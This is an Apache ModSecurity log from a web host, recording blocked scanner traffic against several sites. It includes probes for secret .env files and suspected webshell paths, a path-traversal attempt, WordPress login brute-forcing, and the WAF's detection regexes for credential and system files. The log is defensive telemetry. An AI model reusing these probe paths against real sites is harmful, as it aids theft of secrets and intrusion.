[Tue May 26 16:29:10.234156 2026] [security2:error] [pid 795941:tid 796089] [client 74.249.212.138:7089] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/bal.php"] [unique_id "ahV8_u2GQ_TLE_VHIp2z7AAAAJc"]
[Tue May 26 16:29:10.737904 2026] [http2:info] [pid 808625:tid 808625] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 16:29:10.750641 2026] [security2:error] [pid 808625:tid 808755] [client 74.249.212.138:7076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/cgi-bin/admin.php"] [unique_id "ahV8_jEl_SBaWibfDmpBkQAAAAA"]
[Tue May 26 16:29:10.750801 2026] [security2:error] [pid 808625:tid 808755] [client 74.249.212.138:7076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/cgi-bin/admin.php"] [unique_id "ahV8_jEl_SBaWibfDmpBkQAAAAA"]
[Tue May 26 16:29:10.942022 2026] [security2:error] [pid 808625:tid 808770] [client 74.249.212.138:7069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/gettest.php"] [unique_id "ahV8_jEl_SBaWibfDmpBmQAAAA8"]
[Tue May 26 16:29:10.942159 2026] [security2:error] [pid 808625:tid 808770] [client 74.249.212.138:7069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/gettest.php"] [unique_id "ahV8_jEl_SBaWibfDmpBmQAAAA8"]
[Tue May 26 16:29:11.715764 2026] [security2:error] [pid 808625:tid 808796] [client 74.249.212.138:6999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/BypassBest.php"] [unique_id "ahV8_zEl_SBaWibfDmpBqQAAACk"]
[Tue May 26 16:29:11.715911 2026] [security2:error] [pid 808625:tid 808796] [client 74.249.212.138:6999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-content/BypassBest.php"] [unique_id "ahV8_zEl_SBaWibfDmpBqQAAACk"]
[Tue May 26 16:29:11.755825 2026] [security2:error] [pid 808625:tid 808773] [client 193.37.33.115:29965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV8_zEl_SBaWibfDmpBqAAAABI"]
[Tue May 26 16:29:12.471224 2026] [security2:error] [pid 808625:tid 808825] [client 74.249.212.138:7068] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-content/"] [unique_id "ahV9ADEl_SBaWibfDmpBtAAAAEY"]
[Tue May 26 16:29:12.634763 2026] [security2:error] [pid 808625:tid 808849] [client 74.249.212.138:7068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/simple.php"] [unique_id "ahV9ADEl_SBaWibfDmpBuwAAAF4"]
[Tue May 26 16:29:12.634940 2026] [security2:error] [pid 808625:tid 808849] [client 74.249.212.138:7068] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/simple.php"] [unique_id "ahV9ADEl_SBaWibfDmpBuwAAAF4"]
[Tue May 26 16:29:12.646836 2026] [security2:error] [pid 808625:tid 808810] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8_zEl_SBaWibfDmpBrwAAADc"]
[Tue May 26 16:29:12.814064 2026] [security2:error] [pid 795941:tid 796094] [client 92.118.39.194:6026] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9AO2GQ_TLE_VHIp2z7wAAAJw"]
[Tue May 26 16:29:13.007993 2026] [security2:error] [pid 795941:tid 796138] [client 92.118.39.194:6032] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:helpFilePath. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:helpFilePath"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/jsp/help-hierarchyTree.jsp"] [unique_id "ahV9Ae2GQ_TLE_VHIp2z8AAAAMg"]
[Tue May 26 16:29:13.327725 2026] [security2:error] [pid 808625:tid 808851] [client 74.249.212.138:7114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/buy.php"] [unique_id "ahV9ATEl_SBaWibfDmpBwwAAAGA"]
[Tue May 26 16:29:13.327838 2026] [security2:error] [pid 808625:tid 808851] [client 74.249.212.138:7114] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/buy.php"] [unique_id "ahV9ATEl_SBaWibfDmpBwwAAAGA"]
[Tue May 26 16:29:14.012148 2026] [security2:error] [pid 808625:tid 808879] [client 74.249.212.138:7153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/xxx.php"] [unique_id "ahV9AjEl_SBaWibfDmpB0AAAAHw"]
[Tue May 26 16:29:14.012271 2026] [security2:error] [pid 808625:tid 808879] [client 74.249.212.138:7153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/xxx.php"] [unique_id "ahV9AjEl_SBaWibfDmpB0AAAAHw"]
[Tue May 26 16:29:14.743815 2026] [security2:error] [pid 808625:tid 808767] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9AjEl_SBaWibfDmpB2AAAAAw"]
[Tue May 26 16:29:15.712142 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:50296] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9AzEl_SBaWibfDmpB8wAAAEM"]
[Tue May 26 16:29:16.025708 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:50296] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9AzEl_SBaWibfDmpB8wAAAEM"]
[Tue May 26 16:29:16.025748 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:50296] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9AzEl_SBaWibfDmpB8wAAAEM"]
[Tue May 26 16:29:17.251019 2026] [security2:error] [pid 808625:tid 808814] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9AzEl_SBaWibfDmpB9gAAADs"]
[Tue May 26 16:29:17.745192 2026] [security2:error] [pid 808625:tid 808791] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9BTEl_SBaWibfDmpCIwAAACQ"]
[Tue May 26 16:29:17.841307 2026] [security2:error] [pid 808625:tid 808811] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9BTEl_SBaWibfDmpCJgAAADg"]
[Tue May 26 16:29:17.856147 2026] [security2:error] [pid 808625:tid 808852] [client 92.118.39.194:21710] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9BTEl_SBaWibfDmpCJwAAAGE"]
[Tue May 26 16:29:17.966423 2026] [security2:error] [pid 808625:tid 808756] [client 92.118.39.194:21734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/supabase/.env"] [unique_id "ahV9BTEl_SBaWibfDmpCLAAAAAE"]
[Tue May 26 16:29:18.122498 2026] [security2:error] [pid 808625:tid 808862] [client 92.118.39.194:21766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/app/.env"] [unique_id "ahV9BjEl_SBaWibfDmpCMAAAAGs"]
[Tue May 26 16:29:18.878300 2026] [security2:error] [pid 808625:tid 808820] [client 92.118.39.194:6138] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/public/.env"] [unique_id "ahV9BjEl_SBaWibfDmpCQQAAAEE"]
[Tue May 26 16:29:18.971140 2026] [security2:error] [pid 808625:tid 808813] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9BjEl_SBaWibfDmpCLwAAADo"]
[Tue May 26 16:29:19.430617 2026] [security2:error] [pid 808625:tid 808874] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9BzEl_SBaWibfDmpCSgAAAHc"]
[Tue May 26 16:29:20.103700 2026] [security2:error] [pid 808625:tid 808769] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9CDEl_SBaWibfDmpCXAAAAA4"]
[Tue May 26 16:29:20.255917 2026] [security2:error] [pid 808625:tid 808768] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9CDEl_SBaWibfDmpCYgAAAA0"]
[Tue May 26 16:29:20.839945 2026] [security2:error] [pid 808625:tid 808833] [client 192.3.106.247:37598] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9CDEl_SBaWibfDmpCbwAAAE4"]
[Tue May 26 16:29:20.981995 2026] [security2:error] [pid 808625:tid 808833] [client 192.3.106.247:37598] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9CDEl_SBaWibfDmpCbwAAAE4"]
[Tue May 26 16:29:21.047383 2026] [security2:error] [pid 808625:tid 808804] [client 181.26.233.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9BzEl_SBaWibfDmpCVgAAADE"]
[Tue May 26 16:29:21.348459 2026] [security2:error] [pid 808625:tid 808853] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9BzEl_SBaWibfDmpCWQAAAGI"]
[Tue May 26 16:29:21.386927 2026] [security2:error] [pid 808625:tid 808840] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9CTEl_SBaWibfDmpCegAAAFU"]
[Tue May 26 16:29:21.559214 2026] [security2:error] [pid 808625:tid 808762] [client 92.118.39.194:21740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/.env.local.php"] [unique_id "ahV9CTEl_SBaWibfDmpCfgAAAAc"]
[Tue May 26 16:29:21.575329 2026] [security2:error] [pid 808625:tid 808861] [client 92.118.39.194:21762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/config/.env"] [unique_id "ahV9CTEl_SBaWibfDmpCfwAAAGo"]
[Tue May 26 16:29:21.684496 2026] [security2:error] [pid 808625:tid 808797] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9CTEl_SBaWibfDmpChAAAACo"]
[Tue May 26 16:29:21.685955 2026] [security2:error] [pid 808625:tid 808787] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9CTEl_SBaWibfDmpChQAAACA"]
[Tue May 26 16:29:21.772777 2026] [security2:error] [pid 808625:tid 808775] [client 92.118.39.194:21790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/app/config/.env"] [unique_id "ahV9CTEl_SBaWibfDmpChgAAABQ"]
[Tue May 26 16:29:22.942948 2026] [security2:error] [pid 808625:tid 808845] [client 92.118.39.194:21806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/apps/.env"] [unique_id "ahV9CjEl_SBaWibfDmpClgAAAFo"]
[Tue May 26 16:29:24.715963 2026] [security2:error] [pid 808625:tid 808762] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9CzEl_SBaWibfDmpCpwAAAAc"]
[Tue May 26 16:29:25.327658 2026] [security2:error] [pid 808625:tid 808772] [client 192.3.106.247:37608] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9DTEl_SBaWibfDmpCwAAAABE"]
[Tue May 26 16:29:25.445251 2026] [security2:error] [pid 808625:tid 808772] [client 192.3.106.247:37608] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9DTEl_SBaWibfDmpCwAAAABE"]
[Tue May 26 16:29:26.257308 2026] [security2:error] [pid 808625:tid 808635] [remote 211.23.68.235:45022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahV9DjEl_SBaWibfDmpCzQAAOgk"]
[Tue May 26 16:29:27.016650 2026] [security2:error] [pid 808625:tid 808755] [client 92.118.39.194:5228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/old/.env"] [unique_id "ahV9DzEl_SBaWibfDmpC3QAAAAA"]
[Tue May 26 16:29:27.493194 2026] [security2:error] [pid 808625:tid 808860] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9DzEl_SBaWibfDmpC4AAAAGk"]
[Tue May 26 16:29:27.536419 2026] [security2:error] [pid 808625:tid 808819] [client 92.118.39.194:21886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/new/.env"] [unique_id "ahV9DzEl_SBaWibfDmpC7gAAAEA"]
[Tue May 26 16:29:28.079871 2026] [security2:error] [pid 808625:tid 808817] [client 114.119.129.92:56665] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV9EDEl_SBaWibfDmpC-gAAAD4"], referer: http://haddingtonwines.com/cart?remove_item=580796a888df897b38097bd6c1fdaa96
[Tue May 26 16:29:28.220775 2026] [security2:error] [pid 808625:tid 808827] [client 92.118.39.194:5298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/2020/.env"] [unique_id "ahV9EDEl_SBaWibfDmpDAQAAAEg"]
[Tue May 26 16:29:28.396733 2026] [security2:error] [pid 808625:tid 808772] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9DzEl_SBaWibfDmpC9QAAABE"]
[Tue May 26 16:29:28.677822 2026] [security2:error] [pid 808625:tid 808799] [client 92.118.39.194:5320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/api/core/.env"] [unique_id "ahV9EDEl_SBaWibfDmpDAgAAACw"]
[Tue May 26 16:29:30.117792 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ETEl_SBaWibfDmpDHQAAAGs"]
[Tue May 26 16:29:30.152599 2026] [security2:error] [pid 808625:tid 808822] [client 192.3.106.247:33172] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "lmialumni.org"] [uri "/wp-comments-post.php"] [unique_id "ahV9EjEl_SBaWibfDmpDIgAAAEM"]
